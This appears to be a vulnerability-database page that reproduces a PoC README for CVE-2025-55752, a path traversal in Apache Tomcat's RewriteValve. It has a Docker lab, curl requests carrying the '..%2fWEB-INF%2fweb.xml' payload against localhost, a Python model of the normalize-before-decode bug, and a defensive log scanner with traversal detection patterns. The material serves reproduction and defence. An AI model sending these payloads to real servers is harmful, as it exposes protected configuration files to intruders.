Related vulnerability
Title: Apache Tomcat security vulnerability (CVE-2025-55752)
Description: Apache Tomcat is a lightweight web application server from the Apache Software Foundation (USA) that implements support for Servlets and JavaServer Pages (JSP). Apache Tomcat has a security vulnerability that stems from a path traversal problem in URL rewrite rules, which may lead to bypassing security restrictions and remote code execution. The following versions are affected: 11.0.0-M1 through 11.0.10, 10.1.0-M1 through 10.1.44, 9.0.0.M11 through 9.0.108, and 8.5.6 through 8.5.100.
Introduction
# CVE-2025-55752: Apache Tomcat Path Traversal Vulnerability
Docker-based reproduction environment for CVE-2025-55752, a path traversal vulnerability in Apache Tomcat 10.1.44.
## Overview
CVE-2025-55752 is a path traversal vulnerability in Apache Tomcat's RewriteValve caused by an incorrect processing
order: **URL normalization occurs before URL decoding**. This allows attackers to bypass security constraints
protecting directories like `/WEB-INF/` using URL-encoded path traversal sequences (`..%2f`).
### Vulnerability Characteristics
- **CVE ID**: CVE-2025-55752
- **CVSS v3.1**: 7.5 (HIGH)
- **CWE**: CWE-22 (Path Traversal)
- **Component**: Apache Tomcat RewriteValve
- **Root Cause**: Normalize-before-decode processing order
## Affected Versions
| Series | Vulnerable Versions | Patched Version |
|--------|-------------------|-----------------|
| 11.x | 11.0.0-M1 to 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 to 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 to 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 to 8.5.100 | EOL - No patch |
## Quick Start
```bash
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
```
## Vulnerability Testing
### Test 1: Direct WEB-INF Access (Protected)
```bash
curl -I 'http://localhost:8080/WEB-INF/web.xml'
```
**Expected**: `403 Forbidden`
### Test 2: Information Disclosure (Read Protected Files)
```bash
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
```
**Expected**: `200 OK` + web.xml content (vulnerability confirmed)
## How It Works
1. Request: `/download?path=..%2fWEB-INF%2fweb.xml`
2. RewriteValve rewrites to: `/files/..%2fWEB-INF%2fweb.xml`
3. **URL normalization** (before decode): `%2f` not recognized as `/`, `..` survives
4. **URL decoding**: `%2f` → `/` → `/files/../WEB-INF/web.xml`
5. Path resolution: `/WEB-INF/web.xml`
## Processing Order Issue
```
Correct: Decode → Normalize → Security Check
Vulnerable: Normalize → Decode → Security Check ✗
```
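The following is an added illustration, not code from this repository or from Tomcat: it models the two pipelines above on the page's own request (`/download?path=..%2fWEB-INF%2fweb.xml`). `posixpath.normpath` stands in for Tomcat's normalization step, `urllib.parse.unquote` for its decoding step, and the `/files/` rewrite and the `/WEB-INF/` prefix check are simplified stand-ins for the RewriteValve rule and the security constraint; none of this is the container's real code.

```python
"""Added model of the normalize-before-decode ordering (not Tomcat's code)."""
import posixpath
from urllib.parse import unquote, urlsplit

# Stand-in for the security constraint: anything under these prefixes is denied.
PROTECTED_PREFIXES = ("/WEB-INF/", "/META-INF/")


def rewrite(request_uri: str) -> str:
    """Step 2 of the page: map /download?path=X to /files/X, carrying X
    through *raw* (the rewrite does not decode the query value)."""
    parts = urlsplit(request_uri)
    if parts.path != "/download":
        return parts.path
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        if key == "path":
            return "/files/" + value
    return parts.path


def normalize(path: str) -> str:
    """Collapse '.' and '..' segments. Percent-escapes are NOT touched, so
    '..%2fWEB-INF%2fweb.xml' is one opaque segment and nothing collapses."""
    return posixpath.normpath(path)


def decode(path: str) -> str:
    """Single URL decode: '%2f' becomes '/'."""
    return unquote(path)


def is_allowed(path: str) -> bool:
    """Stand-in security check: deny paths that *start with* a protected prefix."""
    return not any(path.startswith(p) for p in PROTECTED_PREFIXES)


def resolve_vulnerable(rewritten_path: str):
    """Vulnerable order: Normalize -> Decode -> Security Check.
    Returns (path actually served, check result)."""
    stage = normalize(rewritten_path)   # '/files/..%2fWEB-INF%2fweb.xml' (unchanged)
    stage = decode(stage)               # '/files/../WEB-INF/web.xml'
    allowed = is_allowed(stage)         # does not start with /WEB-INF/ -> passes
    served = normalize(stage)           # file lookup collapses '..' -> '/WEB-INF/web.xml'
    return served, allowed


def resolve_fixed(rewritten_path: str):
    """Fixed order: Decode -> Normalize -> Security Check."""
    stage = decode(rewritten_path)      # '/files/../WEB-INF/web.xml'
    stage = normalize(stage)            # '/WEB-INF/web.xml'
    allowed = is_allowed(stage)         # starts with /WEB-INF/ -> denied
    return stage, allowed


if __name__ == "__main__":
    # Constructed request taken from the page's Test 2.
    uri = "/download?path=..%2fWEB-INF%2fweb.xml"
    target = rewrite(uri)
    print("rewritten :", target)
    print("vulnerable:", resolve_vulnerable(target))   # ('/WEB-INF/web.xml', True)
    print("fixed     :", resolve_fixed(target))        # ('/WEB-INF/web.xml', False)
```

The key observation is that in the vulnerable order the security check inspects `/files/../WEB-INF/web.xml`, a string that does not begin with `/WEB-INF/`, so the check passes; only the later file lookup collapses the `..`. Running the same input through the fixed order gives the check the canonical `/WEB-INF/web.xml` and it is refused.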
## Tomcat Fix
- **GitHub**: [apache/tomcat commit 130d36d8](https://github.com/apache/tomcat/commit/130d36d8)
- **Fix**: Decode before normalize
## Mitigation
1. Disable RewriteValve if not required
2. Disable PUT method
3. WAF rules to block `../` and `%2e%2e`
4. Upgrade to patched versions (10.1.45+, 9.0.109+, 11.0.11+)
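As an added defender-side example (not part of this repository), the function below applies the idea behind mitigation 3 to Tomcat-style access log lines: it flags requests whose URI contains a `..` segment in raw, once-decoded or twice-decoded form, so that both `../` and `%2e%2e/` (and the `..%2f` variant used in the page's tests) are caught. The log lines are constructed for this example and the common-log regex is an assumption about the access log format in use; double decoding goes slightly beyond the page's two patterns and is included because a single decode misses `%252e`-style encodings.

```python
"""Added example: flag path-traversal-looking requests in access log lines."""
import re
from urllib.parse import unquote

# Common-log-style line as Tomcat's AccessLogValve emits by default (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# A '..' segment that starts the string or follows '/', '=', '&' or '?'
# and is followed by a slash, backslash or end of string.
TRAVERSAL_RE = re.compile(r'(?:^|[/=&?])\.\.(?:[/\\]|$)')

# Constructed sample lines; the two 10.0.0.9 hits mirror the page's Test 2.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Oct/2025:10:00:01 +0000] "GET /index.jsp HTTP/1.1" 200 3612
10.0.0.7 - - [20/Oct/2025:10:00:02 +0000] "GET /download?path=report.txt HTTP/1.1" 200 1820
10.0.0.9 - - [20/Oct/2025:10:00:03 +0000] "GET /download?path=..%2fWEB-INF%2fweb.xml HTTP/1.1" 200 1431
10.0.0.9 - - [20/Oct/2025:10:00:04 +0000] "GET /download?path=%2e%2e%2fWEB-INF%2fweb.xml HTTP/1.1" 200 1431
10.0.0.9 - - [20/Oct/2025:10:00:05 +0000] "GET /WEB-INF/web.xml HTTP/1.1" 403 -
10.0.0.7 - - [20/Oct/2025:10:00:06 +0000] "GET /files/notes..backup.txt HTTP/1.1" 404 -
"""


def has_traversal(uri: str) -> bool:
    """True if the URI contains a '..' segment in raw or decoded form."""
    candidates = {uri, unquote(uri), unquote(unquote(uri))}
    return any(TRAVERSAL_RE.search(c) for c in candidates)


def find_traversal_requests(log_text: str):
    """Return (ip, uri, status) for every parseable line whose URI looks like traversal."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines in another format rather than guessing
        if has_traversal(m["uri"]):
            hits.append((m["ip"], m["uri"], m["status"]))
    return hits


def successful_traversal_requests(log_text: str):
    """Subset of hits that the server answered with 200: the ones worth triage
    first, since a patched server should not be returning content for them."""
    return [h for h in find_traversal_requests(log_text) if h[2] == "200"]


if __name__ == "__main__":
    for ip, uri, status in find_traversal_requests(SAMPLE_LOG):
        print(f"{ip}\t{status}\t{uri}")
```

The direct `/WEB-INF/web.xml` request (answered 403) is deliberately not flagged: it contains no traversal sequence and the container already refused it. Likewise `notes..backup.txt` is left alone because the `..` is inside a filename, not a path segment.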
## References
- [Apache Tomcat Security](https://tomcat.apache.org/security.html)
- [NVD - CVE-2025-55752](https://nvd.nist.gov/vuln/detail/CVE-2025-55752)
- [OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
- [CWE-22: Improper Limitation of a Pathname](https://cwe.mitre.org/data/definitions/22.html)
## Disclaimer
⚠️ **WARNING**: Do NOT deploy to production. Use only in isolated test environments.
File snapshot
[4.0K] /data/pocs/891dee605d87c9a4b227e689fd9083d1f5b24c8b
├── [4.0K] docker
│ ├── [ 397] Dockerfile
│ ├── [4.0K] scripts
│ │ ├── [8.3K] exploit.py
│ │ └── [4.1K] test_vulnerability.sh
│ └── [4.0K] tomcat
│ ├── [4.0K] conf
│ │ ├── [ 210] context.xml
│ │ ├── [ 115] rewrite.config
│ │ └── [1.8K] server.xml
│ └── [4.0K] webapps
│ └── [4.0K] ROOT
│ ├── [4.0K] files
│ │ └── [1.8K] web.xml
│ ├── [3.8K] handler.jsp
│ ├── [3.6K] index.jsp
│ └── [4.0K] WEB-INF
│ └── [1.4K] web.xml
├── [ 391] docker-compose.yml
└── [2.8K] README.md
9 directories, 12 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is unavailable or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for or donating to the local POC. Thank you for your support.